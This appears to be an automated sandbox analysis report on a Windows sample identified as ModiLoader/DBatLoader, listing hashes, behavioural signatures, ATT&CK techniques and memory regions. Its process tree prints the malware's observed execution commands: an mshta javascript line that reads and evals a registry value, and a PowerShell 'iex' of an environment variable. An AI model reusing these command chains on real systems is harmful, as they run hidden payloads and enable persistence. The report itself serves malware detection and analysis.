Analysis

  • max time kernel
    142s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-06-2024 18:25

General

  • Target

    9f226acd7de1dd335a3bd748f8aa6f9b_JaffaCakes118.exe

  • Size

    360KB

  • MD5

    9f226acd7de1dd335a3bd748f8aa6f9b

  • SHA1

    105ceba7647c3b4edebd5dc244010675ae64ba00

  • SHA256

    509b0cf248e1a1a1443287eb5d5a328c564c5a37af10e156a63a6b607e5ee5bd

  • SHA512

    0a62c9228e9dc9ca2aad4166c4ac686d4b32b41fcda1e06b8c5d6aabf394580a2c8e532cc7d84872dd0b74afad3422fc981880bea91392324e6c11e5932b9781

  • SSDEEP

    6144:fI7kmNy3NyW7btm58icJp8DbxCuoAgUPL26GCFT:fI7kmNy3NyUmMJp8Db8jAVPL26GCx

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9f226acd7de1dd335a3bd748f8aa6f9b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9f226acd7de1dd335a3bd748f8aa6f9b_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • NTFS ADS
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4484
    • C:\Users\Admin\AppData\Local\Temp\9f226acd7de1dd335a3bd748f8aa6f9b_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9f226acd7de1dd335a3bd748f8aa6f9b_JaffaCakes118.exe"
      2⤵
        PID:2364
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:Z22zEZ="fGdCkm";J8E5=new%20ActiveXObject("WScript.Shell");c7jmjTLq="Yi";BkF9P2=J8E5.RegRead("HKCU\\software\\3cj7zq3ra\\0VFTtG");iu7P1dk="ga";eval(BkF9P2);r9uZQHD="GmAG0";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:yrenua
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2128

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ey1jrry4.wfq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2128-17-0x0000000005270000-0x00000000052A6000-memory.dmp
      Filesize

      216KB

    • memory/2128-20-0x0000000006040000-0x00000000060A6000-memory.dmp
      Filesize

      408KB

    • memory/2128-34-0x0000000007E50000-0x00000000084CA000-memory.dmp
      Filesize

      6.5MB

    • memory/2128-32-0x0000000006600000-0x000000000661E000-memory.dmp
      Filesize

      120KB

    • memory/2128-31-0x0000000006120000-0x0000000006474000-memory.dmp
      Filesize

      3.3MB

    • memory/2128-21-0x00000000060B0000-0x0000000006116000-memory.dmp
      Filesize

      408KB

    • memory/2128-19-0x0000000005850000-0x0000000005872000-memory.dmp
      Filesize

      136KB

    • memory/2128-18-0x00000000058E0000-0x0000000005F08000-memory.dmp
      Filesize

      6.2MB

    • memory/2128-35-0x0000000006B00000-0x0000000006B1A000-memory.dmp
      Filesize

      104KB

    • memory/2128-33-0x0000000006620000-0x000000000666C000-memory.dmp
      Filesize

      304KB

    • memory/2364-14-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-10-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-12-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-8-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/2364-7-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/2364-13-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-11-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-5-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/2364-9-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB

    • memory/2364-15-0x0000000000A40000-0x0000000000B1C000-memory.dmp
      Filesize

      880KB